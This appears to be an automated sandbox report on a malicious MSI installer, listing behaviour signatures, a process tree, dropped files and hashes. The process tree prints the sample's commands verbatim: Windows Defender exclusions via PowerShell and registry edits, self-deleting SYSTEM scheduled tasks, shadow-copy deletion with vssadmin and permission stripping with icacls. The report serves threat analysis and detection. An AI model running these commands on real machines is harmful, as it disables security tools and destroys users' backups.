Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    31/07/2026, 02:38

General

  • Target
    install_mal004.msi
  • Size 7.7MB
  • Sample260731-c4sd3abe35
  • SHA256 162c1ff2ecf1301d9417bed899fe3f6d27630189294f968ad66e5b027516cb0a
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 3 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 10 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_mal004.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:3472
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3288
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3516
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 696A7A6935D972CF9D259B392B853AE6 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:2884
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3340
  • C:\Users\Public\DfmbfF\ctWfVg.exe
    "C:\Users\Public\DfmbfF\ctWfVg.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4236
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\DfmbfF\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:3424
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\DfmbfF\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2752
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4972
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2396
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:2768
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:6116
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:5600
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3528
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:6096
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4588
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4768
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4788
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:5632
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1392
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:4916
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:2216
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:5800
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1364
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:3108
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2800
                        • C:\Program Files (x86)\H4x6bj\H4x6bj.exe
                          "C:\Program Files (x86)\H4x6bj\H4x6bj.exe"
                          2⤵
                            PID:5844
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c vssadmin delete shadows /all /quiet
                              3⤵
                              • Executes a command shell one-liner
                              PID:2592
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\H4x6bj" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:4888
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\H4x6bj" /inheritance:r
                                4⤵
                                • Modifies file permissions
                                PID:4512
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:4768
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:4436
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:3580
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\DfmbfF" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:3672
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\DfmbfF" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:260
                        • C:\Windows\system32\cmd.exe
                          cmd.exe
                          1⤵
                            PID:5472
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2112
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:3712
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:52
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:4448
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:3176
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:4808
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:6004
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:5480
                          • C:\Program Files (x86)\H4x6bj\H4x6bj.exe
                            "C:\Program Files (x86)\H4x6bj\H4x6bj.exe"
                            1⤵
                              PID:5880
                            • C:\Program Files (x86)\H4x6bj\H4x6bj.exe
                              "C:\Program Files (x86)\H4x6bj\H4x6bj.exe"
                              1⤵
                                PID:5068
                              • C:\Program Files (x86)\L7KLMCC2H\JPGZ6F0.exe
                                "C:\Program Files (x86)\L7KLMCC2H\JPGZ6F0.exe"
                                1⤵
                                  PID:564

                                Network

                                      MITRE ATT&CK Enterprise v16

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      e595bb4.rbs

                                      • Path C:\Config.Msi\e595bb4.rbs
                                      • Size 7KB
                                      • SHA256 bc972ac97ef903e05c9b1b3ce9b4670ef4b0cf39edc57ce2682c1e0bb68b0b4c
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      H4x6bj.exe

                                      • Path C:\Program Files (x86)\H4x6bj\H4x6bj.exe
                                      • Size 145KB
                                      • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\H4x6bj\XPSPLOG.dll
                                      • Size 4.6MB
                                      • SHA256 326bc69809755a0e1409d62b10f2b394c2a62402cd42a488db4143115bf88f27
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\H4x6bj\XPSPLOG.dll
                                      • Size 3.3MB
                                      • SHA256 f9c2b1759dccbdd9fb9ffc77a8e5397f7476cc93b8338d49bdc0870c094ae7da
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      image.png

                                      • Path C:\Program Files (x86)\H4x6bj\image.png
                                      • Size 4.9MB
                                      • SHA256 bf5aeadd8ec88bd4be51394f7ca11c7cb8ac8ddcd130e6157c3b5df63d786e1e
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      thumbs.db

                                      • Path C:\Program Files (x86)\H4x6bj\thumbs.db
                                      • Size 358KB
                                      • SHA256 e361a8b74fde2bea2c355f199140e51a8b76f3bb9c74a7f16d5e034470a1cce6
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\L7KLMCC2H\XPSPLOG.dll
                                      • Size 3.6MB
                                      • SHA256 d9d1249282d558fe10314dd4e2b9d2c1ab81c6c4e69b66a41bb6cc3e83b1c94b
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\L7KLMCC2H\XPSPLOG.dll
                                      • Size 320KB
                                      • SHA256 f936a23eb785122c4e763222fc0de2852d5f1a3195e64e9900ee71946480f802
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      UxEnhance64.dll

                                      • Path C:\Users\Public\DfmbfF\UxEnhance64.dll
                                      • Size 3.1MB
                                      • SHA256 707b356bcb5996340decdfd86bf360e74f716e0e0e6b49fc78b26d19bbbc8c50
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      adoresd.dat

                                      • Path C:\Users\Public\DfmbfF\adoresd.dat
                                      • Size 4.8MB
                                      • SHA256 f07a0b4cb28da755896e52dd2f2437763286726eba0bcb2ef91693bf3d936102
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      ctWfVg.exe

                                      • Path C:\Users\Public\DfmbfF\ctWfVg.exe
                                      • Size 135KB
                                      • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      msadox.tb

                                      • Path C:\Users\Public\DfmbfF\msadox.tb
                                      • Size 8KB
                                      • SHA256 b4f80afbdaf69371594ccf58bda62be4266dca28e46ccdf3e984a9c7bc77d31b
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      destopbak.ini

                                      • Path C:\Users\Public\Music\destopbak.ini
                                      • Size 2B
                                      • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                      • MD5 SHA1 SHA512

                                      MSI624B.tmp

                                      • Path C:\Windows\Installer\MSI624B.tmp
                                      • Size 7.6MB
                                      • SHA256 9b8835ea6895d8dc16ac076f5013b8851c1e49f4290713ecd97e5f01acec4f81
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      e595bb3.msi

                                      • Path C:\Windows\Installer\e595bb3.msi
                                      • Size 7.7MB
                                      • SHA256 162c1ff2ecf1301d9417bed899fe3f6d27630189294f968ad66e5b027516cb0a
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      metadata-2

                                      • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                      • Size 26.1MB
                                      • SHA256 2a7bb746e7df0640bf203c358735283bdbba03da5c576eea6c9e07abfeb23d86
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      {1d0e1f1b-aa55-4616-9726-87ae66abc388}_OnDiskSnapshotProp

                                      • Path \??\Volume{c61f3bad-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{1d0e1f1b-aa55-4616-9726-87ae66abc388}_OnDiskSnapshotProp
                                      • Size 6KB
                                      • SHA256 c8cac2889f525be931077f09acc2a7d38227276b8ebdaa857b36fc79525fbc65
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      memory/2884-38-0x00007FF817220000-0x00007FF817232000-memory.dmp

                                      memory/2884-16-0x00007FF817220000-0x00007FF817232000-memory.dmp

                                      memory/2884-13-0x00007FF804590000-0x00007FF804BE2000-memory.dmp

                                      memory/2884-12-0x00007FF827CD0000-0x00007FF827CD2000-memory.dmp

                                      memory/4236-102-0x00000217EF810000-0x00000217EF81A000-memory.dmp

                                      memory/4236-101-0x00000217EF750000-0x00000217EF802000-memory.dmp

                                      memory/4236-100-0x00000217EF730000-0x00000217EF74E000-memory.dmp

                                      memory/4236-97-0x00000217EF6D0000-0x00000217EF6F2000-memory.dmp

                                      memory/4324-91-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-70-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-85-0x0000022831CD0000-0x0000022831D5A000-memory.dmp

                                      memory/4324-88-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-86-0x0000022831CD0000-0x0000022831D5A000-memory.dmp

                                      memory/4324-90-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-82-0x0000022831CD0000-0x0000022831D5A000-memory.dmp

                                      memory/4324-81-0x0000022831BF0000-0x0000022831C3E000-memory.dmp

                                      memory/4324-75-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-68-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-71-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-61-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-63-0x00007FF827CE0000-0x00007FF827CE2000-memory.dmp

                                      memory/4324-55-0x00007FF827CD0000-0x00007FF827CD2000-memory.dmp

                                      memory/4324-69-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/4324-84-0x0000022831CD0000-0x0000022831D5A000-memory.dmp

                                      memory/4324-56-0x00007FF8046D0000-0x00007FF804BEE000-memory.dmp

                                      memory/4324-64-0x0000022831330000-0x0000022831BEE000-memory.dmp

                                      memory/5068-246-0x0000000003940000-0x0000000004129000-memory.dmp

                                      memory/5068-253-0x0000000001520000-0x0000000001521000-memory.dmp

                                      memory/5068-237-0x0000000074520000-0x0000000074C6A000-memory.dmp

                                      memory/5068-257-0x00000000014B0000-0x00000000014B1000-memory.dmp

                                      memory/5068-236-0x00000000014B0000-0x00000000014B1000-memory.dmp

                                      memory/5844-194-0x0000000003D10000-0x00000000044F9000-memory.dmp

                                      memory/5844-189-0x0000000003120000-0x0000000003121000-memory.dmp

                                      memory/5844-258-0x0000000003D10000-0x00000000044F9000-memory.dmp

                                      memory/5844-215-0x0000000003D10000-0x00000000044F9000-memory.dmp

                                      memory/5844-201-0x00000000032F0000-0x0000000003304000-memory.dmp

                                      memory/5844-182-0x0000000001560000-0x0000000001561000-memory.dmp

                                      memory/5844-191-0x0000000003D10000-0x00000000044F9000-memory.dmp

                                      memory/5844-224-0x0000000010000000-0x0000000010061000-memory.dmp

                                      memory/5844-183-0x0000000074520000-0x0000000074C6A000-memory.dmp

                                      memory/5844-188-0x0000000003D10000-0x00000000044F9000-memory.dmp

                                      memory/5880-241-0x0000000003670000-0x0000000003E59000-memory.dmp

                                      memory/5880-234-0x0000000074520000-0x0000000074C6A000-memory.dmp

                                      memory/5880-233-0x00000000010A0000-0x00000000010A1000-memory.dmp

                                      memory/5880-261-0x00000000012C0000-0x00000000012C1000-memory.dmp

                                      memory/5880-262-0x0000000003670000-0x0000000003E59000-memory.dmp